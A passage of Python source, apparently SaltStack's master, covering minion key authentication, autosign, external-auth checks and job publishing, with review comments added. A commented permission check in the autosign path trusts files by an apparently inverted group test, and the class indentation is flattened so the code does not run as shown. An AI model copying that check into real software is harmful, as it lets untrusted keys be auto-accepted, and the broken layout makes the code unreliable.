        'expr_form': clear_load.get('tgt_type', 'glob'),
        'tgt': clear_load['tgt'],
        'ret': clear_load['ret'],
        'id': clear_load['id'],
    }
    # Accept the timeout under the legacy 'tmo' key or 'timeout'; when
    # both are present 'timeout' wins (it is processed last).
    # Bug fix: the 'timeout' branch previously formatted its error
    # message with clear_load['tmo'], which reports the wrong value and
    # raises KeyError when 'tmo' is absent.
    for tkey in ('tmo', 'timeout'):
        if tkey in clear_load:
            try:
                load['timeout'] = int(clear_load[tkey])
            except ValueError:
                msg = 'Failed to parse timeout value: {0}'.format(
                    clear_load[tkey])
                log.warn(msg)
                return {}
    if 'tgt_type' in clear_load:
        if clear_load['tgt_type'].startswith('node'):
            if clear_load['tgt'] in self.opts['nodegroups']:
                load['tgt'] = self.opts['nodegroups'][clear_load['tgt']]
                load['expr_form_type'] = 'compound'
            else:
                return {}
        else:
            load['expr_form'] = clear_load['tgt_type']
    load['raw'] = True
    ret = {}
    for minion in self.local.cmd_iter(**load):
        if clear_load.get('form', '') == 'full':
            data = minion
            if 'jid' in minion:
                ret['__jid__'] = minion['jid']
            data['ret'] = data.pop('return')
            ret[minion['id']] = data
        else:
            ret[minion['id']] = minion['return']
            if 'jid' in minion:
                ret['__jid__'] = minion['jid']
    # Robustness: if no minion responded there is no jid to look up,
    # previously this raised KeyError on '__jid__'
    if '__jid__' in ret:
        for key, val in self.local.get_cache_returns(ret['__jid__']).items():
            if key not in ret:
                ret[key] = val
    if clear_load.get('form', '') != 'full':
        ret.pop('__jid__', None)
    return ret
def revoke_auth(self, load):
    '''
    Allow a minion to request revocation of its own key.

    Returns True when the key was deleted, False on a malformed or
    unverified request.
    '''
    if any(key not in load for key in ('id', 'tok')):
        return False
    if not self.__verify_minion(load['id'], load['tok']):
        # The token does not prove ownership of this id -- refuse
        log.warn(
            (
                'Minion id {0} is not who it says it is and is attempting '
                'to revoke the key for {0}'
            ).format(load['id'])
        )
        return False
    keyapi = salt.key.Key(self.opts)
    keyapi.delete_key(load['id'])
    return True
def run_func(self, func, load):
    '''
    Wrapper for running functions executed with AES encryption

    :param func: name of the method on this object to invoke; names
        starting with '__' are refused.
    :param load: decrypted payload handed to the method.
    :returns: the AES-encrypted result, except for '_return' (raw) and
        the v2 '_pillar' path (per-minion key envelope), see inline.
    '''
    # Don't honor private functions
    if func.startswith('__'):
        return self.crypticle.dumps({})
    # Run the func
    if hasattr(self, func):
        try:
            ret = getattr(self, func)(load)
        except Exception:
            # Swallow handler errors so one bad request cannot kill the
            # worker; the empty-string ret is still encrypted below
            ret = ''
            log.error(
                'Error in function {0}:\n'.format(func),
                exc_info=True
            )
    else:
        log.error(
            'Received function {0} which is unavailable on the master, '
            'returning False'.format(
                func
            )
        )
        return self.crypticle.dumps(False)
    # Don't encrypt the return value for the _return func
    # (we don't care about the return value, so why encrypt it?)
    if func == '_return':
        return ret
    if func == '_pillar' and 'id' in load:
        if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
            # Authorized to return old pillar proto
            return self.crypticle.dumps(ret)
        # encrypt with a specific AES key: generate a one-off session
        # key, RSA-encrypt it with the minion's accepted public key
        pubfn = os.path.join(self.opts['pki_dir'],
                             'minions',
                             load['id'])
        key = salt.crypt.Crypticle.generate_key_string()
        pcrypt = salt.crypt.Crypticle(
            self.opts,
            key)
        try:
            pub = RSA.load_pub_key(pubfn)
        except RSA.RSAError:
            return self.crypticle.dumps({})
        pret = {}
        # the literal 4 selects the RSA padding mode in M2Crypto --
        # presumably OAEP; TODO confirm against M2Crypto docs
        pret['key'] = pub.public_encrypt(key, 4)
        pret['pillar'] = pcrypt.dumps(ret)
        return pret
    # AES Encrypt the return
    return self.crypticle.dumps(ret)
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key, master_key, crypticle):
    '''
    Wire up the clear-channel handlers.

    :param opts: master configuration dict
    :param key: master key material (stored as-is; used by callers)
    :param master_key: master key wrapper; _auth reads .key and
        .get_pub_str() from it
    :param crypticle: symmetric cipher used for AES payloads
    '''
    self.opts = opts
    # Serializer bound to the configured serialization format
    self.serial = salt.payload.Serial(opts)
    self.key = key
    self.master_key = master_key
    self.crypticle = crypticle
    # Create the event manager
    self.event = salt.utils.event.MasterEvent(self.opts['sock_dir'])
    # Make a client
    self.local = salt.client.LocalClient(self.opts['conf_file'])
    # Make an minion checker object
    self.ckminions = salt.utils.minions.CkMinions(opts)
    # Make an Auth object
    self.loadauth = salt.auth.LoadAuth(opts)
    # Stand up the master Minion to access returner data
    self.mminion = salt.minion.MasterMinion(
        self.opts,
        states=False,
        rend=False)
    # Make a wheel object
    self.wheel_ = salt.wheel.Wheel(opts)
def _send_cluster(self):
    '''
    Send the cluster data out.

    Pushes the payload built by _cluster_load() to every configured
    cluster master via cluster.distrib.
    '''
    log.debug('Sending out cluster data')
    distrib_result = self.local.cmd(
        self.opts['cluster_masters'],
        'cluster.distrib',
        self._cluster_load(),
        0,
        'list'
    )
    log.debug('Cluster distributed: {0}'.format(distrib_result))
def _cluster_load(self):
    '''
    Generates the data sent to the cluster nodes.

    :returns: list of [minion-pub-keys dict, master config text,
        master pem text ('' unless cluster_mode is 'full'),
        conf_file path]
    '''
    minions = {}
    master_pem = ''
    with salt.utils.fopen(self.opts['conf_file'], 'r') as fp_:
        master_conf = fp_.read()
    minion_dir = os.path.join(self.opts['pki_dir'], 'minions')
    for host in os.listdir(minion_dir):
        pub = os.path.join(minion_dir, host)
        # Bug fix: read the pub key through a context manager so the
        # file handle is closed instead of leaking one per minion
        with salt.utils.fopen(pub, 'r') as fp_:
            minions[host] = fp_.read()
    if self.opts['cluster_mode'] == 'full':
        master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
        with salt.utils.fopen(master_pem_path) as fp_:
            master_pem = fp_.read()
    return [minions,
            master_conf,
            master_pem,
            self.opts['conf_file']]
def _check_permissions(self, filename):
    '''
    Check if the specified filename has correct permissions

    Used to decide whether a file (e.g. the autosign_file) can be
    trusted. Always True on Windows; elsewhere compares ownership and
    write bits against the configured master user.
    '''
    if salt.utils.is_windows():
        return True
    # After we've ascertained we're not on windows
    import grp
    try:
        user = self.opts['user']
        pwnam = pwd.getpwnam(user)
        uid = pwnam[2]
        gid = pwnam[3]
        groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    except KeyError:
        # NOTE(review): if self.opts['user'] itself is the missing key,
        # 'user' is unbound here and this log call raises NameError --
        # confirm opts always carries 'user'
        log.error(
            'Failed to determine groups for user {0}. The user is not '
            'available.\n'.format(
                user
            )
        )
        return False
    fmode = os.stat(filename)
    if os.getuid() == 0:
        # NOTE(review): 'st_gid != gid' trusts any file whose group
        # differs from the master user's group, which reads inverted
        # (one would expect '=='). Confirm intent before changing --
        # this gates autosign trust.
        if fmode.st_uid == uid or fmode.st_gid != gid:
            return True
        elif self.opts.get('permissive_pki_access', False) \
                and fmode.st_gid in groups:
            return True
    else:
        if stat.S_IWOTH & fmode.st_mode:
            # don't allow others to write to the file
            return False
        # check group flags
        if self.opts.get('permissive_pki_access', False) \
                and stat.S_IWGRP & fmode.st_mode:
            return True
        elif stat.S_IWGRP & fmode.st_mode:
            return False
        # check if writable by group or other
        if not (stat.S_IWGRP & fmode.st_mode or
                stat.S_IWOTH & fmode.st_mode):
            return True
    return False
def _check_autosign(self, keyid):
    '''
    Checks if the specified keyid should automatically be signed.

    True when auto_accept is on, or when keyid matches a line of the
    autosign_file as an exact string, a glob, or an anchored regex.
    '''
    if self.opts['auto_accept']:
        return True
    autosign_file = self.opts.get('autosign_file', None)
    if not autosign_file or not os.path.exists(autosign_file):
        return False
    if not self._check_permissions(autosign_file):
        message = 'Wrong permissions for {0}, ignoring content'
        log.warn(message.format(autosign_file))
        return False
    with salt.utils.fopen(autosign_file, 'r') as fp_:
        for raw_line in fp_:
            entry = raw_line.strip()
            if entry.startswith('#'):
                continue
            # Try exact match first, then shell-style glob
            if entry == keyid or fnmatch.fnmatch(keyid, entry):
                return True
            # Finally treat the entry as an anchored regular expression
            try:
                if re.match(r'\A{0}\Z'.format(entry), keyid):
                    return True
            except re.error:
                log.warn(
                    '{0} is not a valid regular expression, ignoring line '
                    'in {1}'.format(
                        entry, autosign_file
                    )
                )
                continue
    return False
def _auth(self, load):
    '''
    Authenticate the client, use the sent public key to encrypt the AES key
    which was generated at start up.
    This method fires an event over the master event manager. The event is
    tagged "auth" and returns a dict with information about the auth
    event

    :param load: dict carrying 'id' and 'pub' (the minion public key
        PEM); may carry 'token' depending on auth_mode.
    :returns: a clear denial/pend payload ({'enc': 'clear', ...}) or an
        acceptance payload ({'enc': 'pub', ...}) with the encrypted
        AES key.
    '''
    # 0. Check for max open files
    # 1. Verify that the key we are receiving matches the stored key
    # 2. Store the key if it is not there
    # 3. make an RSA key with the pub key
    # 4. encrypt the AES key as an encrypted salt.payload
    # 5. package the return and return it
    salt.utils.verify.check_max_open_files(self.opts)
    if not salt.utils.verify.valid_id(self.opts, load['id']):
        log.info(
            'Authentication request from invalid id {id}'.format(**load)
        )
        return {'enc': 'clear',
                'load': {'ret': False}}
    log.info('Authentication request from {id}'.format(**load))
    # Key file locations: accepted, pending and rejected, all keyed
    # by minion id
    pubfn = os.path.join(self.opts['pki_dir'],
                         'minions',
                         load['id'])
    pubfn_pend = os.path.join(self.opts['pki_dir'],
                              'minions_pre',
                              load['id'])
    pubfn_rejected = os.path.join(self.opts['pki_dir'],
                                  'minions_rejected',
                                  load['id'])
    if self.opts['open_mode']:
        # open mode is turned on, nuts to checks and overwrite whatever
        # is there
        pass
    elif os.path.isfile(pubfn_rejected):
        # The key has been rejected, don't place it in pending
        log.info('Public key rejected for {id}'.format(**load))
        ret = {'enc': 'clear',
               'load': {'ret': False}}
        eload = {'result': False,
                 'id': load['id'],
                 'pub': load['pub']}
        self.event.fire_event(eload, tagify(prefix = 'auth'))
        return ret
    elif os.path.isfile(pubfn):
        # The key has been accepted check it
        # NOTE(review): fopen().read() leaks the handle until GC
        if salt.utils.fopen(pubfn, 'r').read() != load['pub']:
            log.error(
                'Authentication attempt from {id} failed, the public '
                'keys did not match. This may be an attempt to compromise '
                'the Salt cluster.'.format(**load)
            )
            ret = {'enc': 'clear',
                   'load': {'ret': False}}
            eload = {'result': False,
                     'id': load['id'],
                     'pub': load['pub']}
            self.event.fire_event(eload, tagify(prefix = 'auth'))
            return ret
    elif not os.path.isfile(pubfn_pend)\
            and not self._check_autosign(load['id']):
        # Unknown key, no autosign: park it in pending for the admin
        if os.path.isdir(pubfn_pend):
            # The key path is a directory, error out
            log.info(
                'New public key id is a directory {id}'.format(**load)
            )
            ret = {'enc': 'clear',
                   'load': {'ret': False}}
            eload = {'result': False,
                     'id': load['id'],
                     'pub': load['pub']}
            self.event.fire_event(eload, tagify(prefix = 'auth'))
            return ret
        # This is a new key, stick it in pre
        log.info(
            'New public key placed in pending for {id}'.format(**load)
        )
        with salt.utils.fopen(pubfn_pend, 'w+') as fp_:
            fp_.write(load['pub'])
        ret = {'enc': 'clear',
               'load': {'ret': True}}
        eload = {'result': True,
                 'act': 'pend',
                 'id': load['id'],
                 'pub': load['pub']}
        self.event.fire_event(eload, tagify(prefix = 'auth'))
        return ret
    elif os.path.isfile(pubfn_pend)\
            and not self._check_autosign(load['id']):
        # This key is in pending, if it is the same key ret True, else
        # ret False
        if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']:
            log.error(
                'Authentication attempt from {id} failed, the public '
                'keys in pending did not match. This may be an attempt to '
                'compromise the Salt cluster.'.format(**load)
            )
            eload = {'result': False,
                     'id': load['id'],
                     'pub': load['pub']}
            self.event.fire_event(eload, tagify(prefix = 'auth'))
            return {'enc': 'clear',
                    'load': {'ret': False}}
        else:
            log.info(
                'Authentication failed from host {id}, the key is in '
                'pending and needs to be accepted with salt-key '
                '-a {id}'.format(**load)
            )
            eload = {'result': True,
                     'act': 'pend',
                     'id': load['id'],
                     'pub': load['pub']}
            self.event.fire_event(eload, tagify(prefix = 'auth'))
            return {'enc': 'clear',
                    'load': {'ret': True}}
    elif os.path.isfile(pubfn_pend)\
            and self._check_autosign(load['id']):
        # This key is in pending, if it is the same key auto accept it
        if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']:
            log.error(
                'Authentication attempt from {id} failed, the public '
                'keys in pending did not match. This may be an attempt to '
                'compromise the Salt cluster.'.format(**load)
            )
            eload = {'result': False,
                     'id': load['id'],
                     'pub': load['pub']}
            self.event.fire_event(eload, tagify(prefix = 'auth'))
            return {'enc': 'clear',
                    'load': {'ret': False}}
        else:
            # Same key as pending: fall through to acceptance below
            pass
    elif not os.path.isfile(pubfn_pend)\
            and self._check_autosign(load['id']):
        # This is a new key and it should be automatically be accepted
        pass
    else:
        # Something happened that I have not accounted for, FAIL!
        log.warn('Unaccounted for authentication failure')
        eload = {'result': False,
                 'id': load['id'],
                 'pub': load['pub']}
        self.event.fire_event(eload, tagify(prefix = 'auth'))
        return {'enc': 'clear',
                'load': {'ret': False}}
    log.info('Authentication accepted from {id}'.format(**load))
    # Reaching here means the key is accepted: persist it and build the
    # encrypted handshake response
    with salt.utils.fopen(pubfn, 'w+') as fp_:
        fp_.write(load['pub'])
    pub = None
    # The key payload may sometimes be corrupt when using auto-accept
    # and an empty request comes in
    try:
        pub = RSA.load_pub_key(pubfn)
    except RSA.RSAError as err:
        log.error('Corrupt public key "{0}": {1}'.format(pubfn, err))
        return {'enc': 'clear',
                'load': {'ret': False}}
    ret = {'enc': 'pub',
           'pub_key': self.master_key.get_pub_str(),
           'publish_port': self.opts['publish_port'],
          }
    if self.opts['auth_mode'] >= 2:
        if 'token' in load:
            try:
                mtoken = self.master_key.key.private_decrypt(load['token'], 4)
                aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken)
            except Exception:
                # Token failed to decrypt, send back the salty bacon to
                # support older minions
                # NOTE(review): on this path 'aes' is never bound, so the
                # public_encrypt below raises NameError -- confirm the
                # intended fallback (presumably aes = self.opts['aes'])
                pass
        else:
            aes = self.opts['aes']
        ret['aes'] = pub.public_encrypt(aes, 4)
    else:
        if 'token' in load:
            try:
                mtoken = self.master_key.key.private_decrypt(
                    load['token'], 4
                )
                ret['token'] = pub.public_encrypt(mtoken, 4)
            except Exception:
                # Token failed to decrypt, send back the salty bacon to
                # support older minions
                pass
        aes = self.opts['aes']
        ret['aes'] = pub.public_encrypt(self.opts['aes'], 4)
    # Be aggressive about the signature
    digest = hashlib.sha256(aes).hexdigest()
    ret['sig'] = self.master_key.key.private_encrypt(digest, 5)
    eload = {'result': True,
             'act': 'accept',
             'id': load['id'],
             'pub': load['pub']}
    self.event.fire_event(eload, tagify(prefix = 'auth'))
    return ret
def runner(self, clear_load):
    '''
    Send a master control function back to the wheel system

    Two auth paths: an eauth token under 'token', or explicit eauth
    credentials under 'eauth'. Any failure returns ''.
    NOTE(review): '.async(' is valid only on Python 2 -- 'async' is a
    reserved word on modern Python 3; this module predates that.
    '''
    # All wheel ops pass through eauth
    if 'token' in clear_load:
        try:
            token = self.loadauth.get_tok(clear_load['token'])
        except Exception as exc:
            log.error(
                'Exception occurred when generating auth token: {0}'.format(
                    exc
                )
            )
            return ''
        if not token:
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        if token['eauth'] not in self.opts['external_auth']:
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        if token['name'] not in self.opts['external_auth'][token['eauth']]:
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        # Use the per-user ACL when present, else the '*' wildcard ACL
        good = self.ckminions.runner_check(
            self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'],
            clear_load['fun'])
        if not good:
            msg = ('Authentication failure of type "token" occurred for '
                   'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
            log.warning(msg)
            return ''
        try:
            fun = clear_load.pop('fun')
            runner_client = salt.runner.RunnerClient(self.opts)
            return runner_client.async(fun, clear_load.get('kwarg', {}))
        except Exception as exc:
            # NOTE(review): if pop('fun') itself raised, 'fun' is unbound
            # in this log call -- confirm 'fun' is always present
            log.error('Exception occurred while '
                      'introspecting {0}: {1}'.format(fun, exc))
            return ''
    # Credential-based eauth path
    if 'eauth' not in clear_load:
        msg = ('Authentication failure of type "eauth" occurred for '
               'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
        log.warning(msg)
        return ''
    if clear_load['eauth'] not in self.opts['external_auth']:
        # The eauth system is not enabled, fail
        msg = ('Authentication failure of type "eauth" occurred for '
               'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
        log.warning(msg)
        return ''
    try:
        name = self.loadauth.load_name(clear_load)
        if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])):
            msg = ('Authentication failure of type "eauth" occurred for '
                   'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
            log.warning(msg)
            return ''
        if not self.loadauth.time_auth(clear_load):
            msg = ('Authentication failure of type "eauth" occurred for '
                   'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
            log.warning(msg)
            return ''
        good = self.ckminions.runner_check(
            self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][clear_load['eauth']]['*'],
            clear_load['fun'])
        if not good:
            msg = ('Authentication failure of type "eauth" occurred for '
                   'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
            log.warning(msg)
            return ''
        try:
            fun = clear_load.pop('fun')
            runner_client = salt.runner.RunnerClient(self.opts)
            return runner_client.async(fun, clear_load.get('kwarg', {}))
        except Exception as exc:
            log.error('Exception occurred while '
                      'introspecting {0}: {1}'.format(fun, exc))
            return ''
    except Exception as exc:
        log.error(
            'Exception occurred in the wheel system: {0}'.format(exc)
        )
        return ''
def wheel(self, clear_load):
    '''
    Send a master control function back to the wheel system

    Two auth paths: an eauth token under 'token', or explicit eauth
    credentials under 'eauth'. Any authentication failure returns ''.
    '''
    # All wheel ops pass through eauth
    if 'token' in clear_load:
        try:
            token = self.loadauth.get_tok(clear_load['token'])
        except Exception as exc:
            log.error(
                'Exception occurred when generating auth token: {0}'.format(
                    exc
                )
            )
            return ''
        if not token:
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        if token['eauth'] not in self.opts['external_auth']:
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        if token['name'] not in self.opts['external_auth'][token['eauth']]:
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        # Use the per-user ACL when present, else the '*' wildcard ACL
        good = self.ckminions.wheel_check(
            self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'],
            clear_load['fun'])
        if not good:
            msg = ('Authentication failure of type "token" occurred for '
                   'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
            log.warning(msg)
            return ''
        try:
            fun = clear_load.pop('fun')
            return self.wheel_.call_func(fun, **clear_load.get('kwarg', {}))
        except Exception as exc:
            log.error('Exception occurred while '
                      'introspecting {0}: {1}'.format(fun, exc))
            return ''
    # Credential-based eauth path
    if 'eauth' not in clear_load:
        msg = ('Authentication failure of type "eauth" occurred for '
               'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
        log.warning(msg)
        return ''
    if clear_load['eauth'] not in self.opts['external_auth']:
        # The eauth system is not enabled, fail
        msg = ('Authentication failure of type "eauth" occurred for '
               'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
        log.warning(msg)
        return ''
    try:
        name = self.loadauth.load_name(clear_load)
        if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])):
            msg = ('Authentication failure of type "eauth" occurred for '
                   'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
            log.warning(msg)
            return ''
        if not self.loadauth.time_auth(clear_load):
            msg = ('Authentication failure of type "eauth" occurred for '
                   'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
            log.warning(msg)
            return ''
        # Bug fix: the wildcard fallback previously read
        # self.opts['external_auth'][token['eauth']]['*'], but 'token'
        # is undefined on this credential path (NameError); use the
        # eauth name from clear_load, matching runner().
        good = self.ckminions.wheel_check(
            self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][clear_load['eauth']]['*'],
            clear_load['fun'])
        if not good:
            msg = ('Authentication failure of type "eauth" occurred for '
                   'user {0}.').format(clear_load.get('username', 'UNKNOWN'))
            log.warning(msg)
            return ''
        try:
            fun = clear_load.pop('fun')
            return self.wheel_.call_func(fun, **clear_load.get('kwarg', {}))
        except Exception as exc:
            log.error('Exception occurred while '
                      'introspecting {0}: {1}'.format(fun, exc))
            return ''
    except Exception as exc:
        log.error(
            'Exception occurred in the wheel system: {0}'.format(exc)
        )
        return ''
def mk_token(self, clear_load):
    '''
    Create and return an authentication token, the clear load needs to
    contain the eauth key and the needed authentication creds.

    Returns '' on any authentication failure.
    '''
    if 'eauth' not in clear_load:
        log.warning('Authentication failure of type "eauth" occurred.')
        return ''
    eauth = clear_load['eauth']
    if eauth not in self.opts['external_auth']:
        # The eauth system is not enabled, fail
        log.warning('Authentication failure of type "eauth" occurred.')
        return ''
    try:
        name = self.loadauth.load_name(clear_load)
        acl = self.opts['external_auth'][eauth]
        # The user must appear in the ACL, directly or via the wildcard
        if name not in acl and '*' not in acl:
            log.warning('Authentication failure of type "eauth" occurred.')
            return ''
        if not self.loadauth.time_auth(clear_load):
            log.warning('Authentication failure of type "eauth" occurred.')
            return ''
        return self.loadauth.mk_token(clear_load)
    except Exception as exc:
        log.error(
            'Exception occurred while authenticating: {0}'.format(exc)
        )
        return ''
def get_token(self, clear_load):
    '''
    Return the name associated with a token or False if the token is invalid
    '''
    try:
        tok = clear_load['token']
    except KeyError:
        return False
    return self.loadauth.get_tok(tok)
def publish(self, clear_load):
    '''
    This method sends out publications to the minions, it can only be used
    by the LocalClient.
    '''
    # kwargs carries the optional auth material (token or eauth creds).
    extra = clear_load.get('kwargs', {})
    # check blacklist/whitelist
    good = True
    # Check if the user is blacklisted
    for user_re in self.opts['client_acl_blacklist'].get('users', []):
        if re.match(user_re, clear_load['user']):
            good = False
            break
    # check if the cmd is blacklisted
    for module_re in self.opts['client_acl_blacklist'].get('modules', []):
        if re.match(module_re, clear_load['fun']):
            good = False
            break
    if good is False:
        log.error(
            '{user} does not have permissions to run {function}. Please '
            'contact your local administrator if you believe this is in '
            'error.\n'.format(
                user=clear_load['user'],
                function=clear_load['fun']
            )
        )
        return ''
    # to make sure we don't step on anyone else's toes
    del good
    # --- Authentication: exactly one of token / eauth / user / raw-key ---
    # Check for external auth calls
    if extra.get('token', False):
        # A token was passed, check it
        try:
            token = self.loadauth.get_tok(extra['token'])
        except Exception as exc:
            log.error(
                'Exception occurred when generating auth token: {0}'.format(
                    exc
                )
            )
            return ''
        if not token:
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        if token['eauth'] not in self.opts['external_auth']:
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        # NOTE(review): `|` is a bitwise-or on two membership booleans; it
        # behaves like a non-short-circuiting `or` here.
        if not ((token['name'] in self.opts['external_auth'][token['eauth']]) | ('*' in self.opts['external_auth'][token['eauth']])):
            log.warning('Authentication failure of type "token" occurred.')
            return ''
        # Use the user's ACL entry if present, else the '*' wildcard entry.
        good = self.ckminions.auth_check(
            self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'],
            clear_load['fun'],
            clear_load['tgt'],
            clear_load.get('tgt_type', 'glob'))
        if not good:
            # Accept find_job so the CLI will function cleanly
            if clear_load['fun'] != 'saltutil.find_job':
                log.warning(
                    'Authentication failure of type "token" occurred.'
                )
                return ''
    elif 'eauth' in extra:
        if extra['eauth'] not in self.opts['external_auth']:
            # The eauth system is not enabled, fail
            log.warning(
                'Authentication failure of type "eauth" occurred.'
            )
            return ''
        try:
            name = self.loadauth.load_name(extra)
            if not ((name in self.opts['external_auth'][extra['eauth']]) | ('*' in self.opts['external_auth'][extra['eauth']])):
                log.warning(
                    'Authentication failure of type "eauth" occurred.'
                )
                return ''
            if not self.loadauth.time_auth(extra):
                log.warning(
                    'Authentication failure of type "eauth" occurred.'
                )
                return ''
        except Exception as exc:
            log.error(
                'Exception occurred while authenticating: {0}'.format(exc)
            )
            return ''
        good = self.ckminions.auth_check(
            self.opts['external_auth'][extra['eauth']][name] if name in self.opts['external_auth'][extra['eauth']] else self.opts['external_auth'][extra['eauth']]['*'],
            clear_load['fun'],
            clear_load['tgt'],
            clear_load.get('tgt_type', 'glob'))
        if not good:
            # Accept find_job so the CLI will function cleanly
            if clear_load['fun'] != 'saltutil.find_job':
                log.warning(
                    'Authentication failure of type "eauth" occurred.'
                )
                return ''
    # Verify that the caller has root on master
    elif 'user' in clear_load:
        if clear_load['user'].startswith('sudo_'):
            # If someone can sudo, allow them to act as root
            if clear_load.get('key', 'invalid') == self.key.get('root'):
                clear_load.pop('key')
            elif clear_load.pop('key') != self.key[self.opts.get('user', 'root')]:
                log.warning(
                    'Authentication failure of type "user" occurred.'
                )
                return ''
        elif clear_load['user'] == self.opts.get('user', 'root'):
            if clear_load.pop('key') != self.key[self.opts.get('user', 'root')]:
                log.warning(
                    'Authentication failure of type "user" occurred.'
                )
                return ''
        elif clear_load['user'] == 'root':
            if clear_load.pop('key') != self.key.get(self.opts.get('user', 'root')):
                log.warning(
                    'Authentication failure of type "user" occurred.'
                )
                return ''
        elif clear_load['user'] == getpass.getuser():
            if clear_load.pop('key') != self.key.get(clear_load['user']):
                log.warning(
                    'Authentication failure of type "user" occurred.'
                )
                return ''
        else:
            if clear_load['user'] in self.key:
                # User is authorised, check key and check perms
                if clear_load.pop('key') != self.key[clear_load['user']]:
                    log.warning(
                        'Authentication failure of type "user" occurred.'
                    )
                    return ''
                if clear_load['user'] not in self.opts['client_acl']:
                    log.warning(
                        'Authentication failure of type "user" occurred.'
                    )
                    return ''
                good = self.ckminions.auth_check(
                    self.opts['client_acl'][clear_load['user']],
                    clear_load['fun'],
                    clear_load['tgt'],
                    clear_load.get('tgt_type', 'glob'))
                if not good:
                    # Accept find_job so the CLI will function cleanly
                    if clear_load['fun'] != 'saltutil.find_job':
                        log.warning(
                            'Authentication failure of type "user" '
                            'occurred.'
                        )
                        return ''
            else:
                log.warning(
                    'Authentication failure of type "user" occurred.'
                )
                return ''
    else:
        # No token/eauth/user supplied: require the local root key.
        if clear_load.pop('key') != self.key[getpass.getuser()]:
            log.warning(
                'Authentication failure of type "other" occurred.'
            )
            return ''
    # --- Authenticated from here on; resolve targets and fire the job ---
    # Retrieve the minions list
    minions = self.ckminions.check_minions(
        clear_load['tgt'],
        clear_load.get('tgt_type', 'glob')
    )
    # If we order masters (via a syndic), don't short circuit if no minions
    # are found
    if not self.opts.get('order_masters'):
        # Check for no minions
        if not minions:
            return {
                'enc': 'clear',
                'load': {
                    'jid': None,
                    'minions': minions
                }
            }
    # Retrieve the jid
    if not clear_load['jid']:
        clear_load['jid'] = salt.utils.prep_jid(
            self.opts['cachedir'],
            self.opts['hash_type'],
            extra.get('nocache', False)
        )
    self.event.fire_event({'minions': minions}, clear_load['jid'])
    jid_dir = salt.utils.jid_dir(
        clear_load['jid'],
        self.opts['cachedir'],
        self.opts['hash_type']
    )
    new_job_load = {
        'jid': clear_load['jid'],
        'tgt_type':clear_load['tgt_type'],
        'tgt': clear_load['tgt'],
        'ret': clear_load['ret'],
        'user': clear_load['user'],
        'fun': clear_load['fun'],
        'arg': clear_load['arg'],
        'minions': minions,
    }
    # Announce the job on the event bus
    self.event.fire_event(new_job_load, 'new_job')  # old dup event
    self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
    # Verify the jid dir
    if not os.path.isdir(jid_dir):
        os.makedirs(jid_dir)
    # Save the invocation information
    self.serial.dump(
        clear_load,
        salt.utils.fopen(os.path.join(jid_dir, '.load.p'), 'w+')
    )
    if self.opts['ext_job_cache']:
        try:
            fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
            self.mminion.returners[fstr](clear_load['jid'], clear_load)
        except KeyError:
            log.critical(
                'The specified returner used for the external job cache '
                '"{0}" does not have a save_load function!'.format(
                    self.opts['ext_job_cache']
                )
            )
        except Exception:
            log.critical(
                'The specified returner threw a stack trace:\n',
                exc_info=True
            )
    # Set up the payload
    payload = {'enc': 'aes'}
    # Altering the contents of the publish load is serious!! Changes here
    # break compatibility with minion/master versions and even tiny
    # additions can have serious implications on the performance of the
    # publish commands.
    #
    # In short, check with Thomas Hatch before you even think about
    # touching this stuff, we can probably do what you want to do another
    # way that won't have a negative impact.
    load = {
        'fun': clear_load['fun'],
        'arg': clear_load['arg'],
        'tgt': clear_load['tgt'],
        'jid': clear_load['jid'],
        'ret': clear_load['ret'],
    }
    if 'id' in extra:
        load['id'] = extra['id']
    if 'tgt_type' in clear_load:
        load['tgt_type'] = clear_load['tgt_type']
    if 'to' in clear_load:
        load['to'] = clear_load['to']
    if 'user' in clear_load:
        log.info(
            'User {user} Published command {fun} with jid {jid}'.format(
                **clear_load
            )
        )
        load['user'] = clear_load['user']
    else:
        log.info(
            'Published command {fun} with jid {jid}'.format(
                **clear_load
            )
        )
    log.debug('Published command details {0}'.format(load))
    # Encrypt the load and push it to the local publisher process over IPC.
    payload['load'] = self.crypticle.dumps(load)
    # Send 0MQ to the publisher
    context = zmq.Context(1)
